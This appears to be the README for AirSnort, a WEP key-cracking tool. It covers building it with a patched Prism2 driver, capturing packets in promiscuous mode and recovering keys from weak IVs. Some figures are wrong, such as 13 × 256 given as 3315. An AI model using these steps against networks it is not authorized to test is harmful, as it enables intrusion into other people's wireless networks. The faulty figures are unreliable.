- AirSnort Installation

AirSnort ONLY works with Prism2 cards! Assuming you have one of these,
and a linux installation, you must have the following available to
build AirSnort:

       * Kernel source code
       * PCMCIA CS package source code
       * linux-wlan-ng - version You must have version 0.18-pre13.
       * wlan-monitor patch
       * AirSnort source

All of these are available on our website.

To start, you must configure the kernel source code. This will link
the include directories in the the source tree to the system wide
directory, /usr/include. The kernel source code need not be compiled
or installed, but it must be the same version as the one running. The
kernel version can be determined with the command 'uname -a.' In
addition, the running needs to support loadable modules, PCMCIA and
netlink. If the running kernel does not support these, you will need
to compile and install the source code.

The source code for PCMCIA must be installed, and it must be the same
as the version you are running. To determine the version of PCMCIA CS
you are running, consult the output of the command 'cardmgr -V.' If you
have the appropriate version, you need not compile and install the
source code, but you must complete the configuration process. All of
the defaults are okay.

The linux-wlan-ng is the kernel module to drive wlan cards. Only the
Prism2 driver supports raw packet capturing, so it is the only one we
are interested in. This card's driver no longer supports raw packet
capture, but it can easily be added. From the directory which contains
the linux-wlan-ng subdirectory, run the command 

$ patch -p0 < wlan-monitor.patch

Then you must make and install the linux-wlan-ng driver. You must
[re]start the cardmgr, and you can then insert your wlan card. If
anything failed, consult the linux-wlan-ng documentation.  This is the
last prerequisite for AirSnort.

Assuming everything went well, AirSnort can now be built. This makes
two executables, 'capture' and 'crack.' If everything went well, the
section "Running AirSnort" is right for you. If anything failed,
(predictably,) consult the appropriate package's documentation.

- Running AirSnort

The first thing to be done to crack 802.11b is to get unmodified
encrypted packets. This can be done by putting the card in a mode
which gathers all packets indiscriminately. This mode is known as
promiscuous mode, and it can be entered by running the command
'dopromisc.sh,' which is in the scripts directory. The channel in the
script defaults to channel 6, but you may wish to change it if the
network you are analyzing is on a different channel. 

If the card is now in promiscuous mode, you can now run 'capture.' The
parameters to capture are simple, the -c switch presents a display of
its progress, which is updated every second. The second, required
parameter is a filename, which is where the captured packets are
stored. If you are running capture in curses mode, the most important
parameter is "Interesting Packets." An interesting packet is one in
which the second byte of the IV is FF. 

At intervals, you will probably wish to try and crack the password
with the data you have gathered. You can simply run the command
'crack' on the file generated by capture. It is intended that capture
be run on one terminal, while crack on another, once enough packets
have been gathered. 

The number of interesting packets needed to perform a successful crack
depends on two things; luck and key length. Assuming that luck is on
your side, the key length is the only important factor. For a key
length of 128 bits, this translates to about 1500 packets. For other
key lengths, assume 115 packets per byte of the key.

The only parameter to the crack program is the breadth of the tree
search. For a discussion of the algorithm, and how it affects runtime,
and statistics, see the section "AirSnort Theory."

In any case, if the crack program believes it has a correct password,
it checks the checksum of a random packet. If this is successful, the
correct password printed in ASCII and Hex. If it is unsuccessful, an
error message is printed, which will soon become painfully familiar to
anyone who uses AirSnort for any extended period of time. 

- Capture Details

Capture uses the Linux Netlink. If the device on the other end is in
the correct mode, it simply opens it and begins gathering data. The
packets go through two filters. First, non-encrypted packets are
filtered out. Then, if they are encrypted, useless packets are
discarded.

To distinguish encrypted and non-encrypted packets, capture examines
the first bytes of the output. Since unencrypted packets have a first
byte with the value 0xAA, all of these packets get dropped. This byte
comes from the Snap header.

Useful packets are those with the following property of their IV; the
first byte is a number three greater than one of the offsets of the
bytes of the key. For 128 bit encryption, this means a number from
3-16. The second byte must be 255 and the third byte can have any
value. This means that for every byte of the key, there are 256 weak
IVs. 

When every weak IV has been gathered (13 key bytes * 256 = 3315
packets), there is no point to continuing the capture process. In
reality, it takes somewhat fewer packets than this.

- Cracking Details

When executing the cracking operation, crack reads in the packets from
the output file produced by capture. Since capture appends to this
file, the examined data may be from several capture sessions. In any
case, capture operates with a partial key search from the given
data. Since it is a probabalistic attack, The best guess may not be
the right one, so, with limited captured data and enough CPU power,
you can perform more exaustive searches. By setting the breadth
parameter, you can specify to search "worse" guesses. It is not
suggested that you specify a breadth of more than three or four.

See the paper linked on our website for a reference to the paper
describing the attack.
